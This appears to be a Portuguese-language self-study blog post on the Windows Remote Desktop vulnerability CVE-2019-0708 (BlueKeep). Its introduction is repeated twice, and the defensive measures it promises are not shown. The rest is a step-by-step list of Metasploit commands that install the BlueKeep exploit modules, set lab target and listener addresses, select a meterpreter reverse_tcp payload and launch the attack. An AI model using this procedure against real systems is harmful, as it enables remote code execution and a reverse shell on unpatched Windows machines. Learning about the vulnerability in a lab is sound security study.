
Este artigo compartilhará a vulnerabilidade do serviço de Área de Trabalho Remota do Windows (CVE-2019-0708) e explicará detalhadamente essa vulnerabilidade e as medidas de defesa. Como iniciante em segurança cibernética, o autor compartilha alguns tutoriais básicos de autoaprendizagem, principalmente notas online sobre ferramentas de segurança e práticas operacionais. Espero que gostem. Além disso, espero que possam praticar e progredir junto comigo. Futuramente, irei aprofundar os conhecimentos em segurança cibernética e de sistemas, compartilhando experimentos relacionados. Em suma, espero que esta série de artigos seja útil para os colegas. Escrever artigos não é fácil, mestres, por favor, não critiquem se não gostarem. Obrigado!
Este artigo compartilhará a vulnerabilidade do serviço de área de trabalho remota do Windows (CVE-2019-0708) e explicará detalhadamente a vulnerabilidade e as medidas de defesa. Como iniciante em segurança cibernética, o autor compartilha alguns tutoriais básicos de autoaprendizagem com todos, principalmente notas online sobre ferramentas de segurança e práticas operacionais. Espero que gostem. Além disso, espero que vocês possam operar e progredir comigo. Futuramente, irei estudar mais profundamente conhecimentos de segurança cibernética e segurança de sistemas e compartilhar experimentos relacionados. Em suma, espero que esta série de artigos seja útil para os colegas blogueiros. Escrever artigos não é fácil, se os mestres não gostarem, por favor não critiquem, obrigado!
Blog correspondente:
[Série de autoaprendizagem em segurança cibernética] 58. Exploração de vulnerabilidades do Windows: revisitando CVE-2019-0708 e Metasploit reverse shell
[Série de autoaprendizagem em segurança cibernética] 44. Reprodução e explicação detalhada da vulnerabilidade do serviço de área de trabalho remota do Windows (CVE-2019-0708)
Comandos principais:
# Copiar arquivos
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# Iniciar ferramenta
msfconsole
reload_all
search 0708
# Usar script
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Ver informações
show options
show targets
info
# Configurar endereço de escuta, endereço alvo, payload reverso, tipo de alvo
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# Executar script
run
exploit
# Configurar largura de banda
Set GROOMSIZE 40